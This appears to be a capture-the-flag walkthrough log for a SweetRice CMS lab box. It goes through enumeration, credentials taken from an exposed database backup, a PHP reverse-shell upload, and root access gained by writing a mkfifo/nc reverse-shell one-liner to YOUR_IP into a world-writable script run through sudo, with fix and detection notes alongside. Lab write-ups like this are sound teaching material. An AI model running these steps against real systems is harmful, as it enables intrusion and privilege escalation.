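# Walkthrough transcript (command log with notes), not a runnable script.
# Commands are entered interactively: scanning and listeners on the tester's
# machine, the rest in the shell obtained on the target.
# TARGET_IP and YOUR_IP are placeholders.

# Step 1: Enumeration
nmap -sV TARGET_IP
# 22 SSH, 80 HTTP

gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /content

# Further enumeration
gobuster dir -u http://TARGET_IP/content -w /usr/share/wordlists/dirb/common.txt
# Found: /content/as (admin login), /content/inc

# Step 2: Find Credentials
# Check /content/inc/mysql_backup
# Download and examine backup file
# Contains: manager:Password123 (or similar)
#
# Root cause: a database backup sits under the web root and, as described
# here, can be fetched before any login. Fix: store backups outside the
# document root, deny web access to /content/inc, and rotate every
# credential that appears in the dump.

# Step 3: SweetRice Exploitation
# Login at /content/as
# Version has known vulnerabilities

# Method 1: File upload via Ads section
# Upload PHP reverse shell as "ad"

# Method 2: Direct code execution vulnerability
searchsploit sweetrice
# Multiple exploits available
#
# Root cause: an unpatched CMS whose admin panel stores content that the
# server later executes as PHP. Fix: upgrade SweetRice, restrict access to
# /content/as, and disable PHP execution where uploaded content is stored.
# Detection: admin-panel POSTs followed by outbound connections from the
# web-server account.

# Step 4: Get Shell
nc -lvnp 4444
# Trigger uploaded shell

# NOTE: "user" is presumably a placeholder for the account name; later steps
# reference /home/itguy.
cat /home/user/user.txt

# Step 5: Privilege Escalation
sudo -l
# Can run /home/itguy/backup.pl as root

cat /home/itguy/backup.pl
# Calls /etc/copy.sh

cat /etc/copy.sh
# World writable!
#
# Root cause: sudo allows a script to run as root, and that script executes
# a file any local user can modify, so whoever can write /etc/copy.sh
# controls what root runs.

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR_IP 5555 >/tmp/f' > /etc/copy.sh

nc -lvnp 5555
sudo /usr/bin/perl /home/itguy/backup.pl
# Root shell!

cat /root/root.txt

# Fix for Step 5: make the helper root-owned and not writable by others
# (chown root:root /etc/copy.sh; chmod 755 /etc/copy.sh), and review every
# sudoers entry for scripts that call files outside root-only directories.
# Detection: an audit watch on the helper (auditctl -w /etc/copy.sh -p wa)
# and alerts on sudo-spawned processes opening outbound connections.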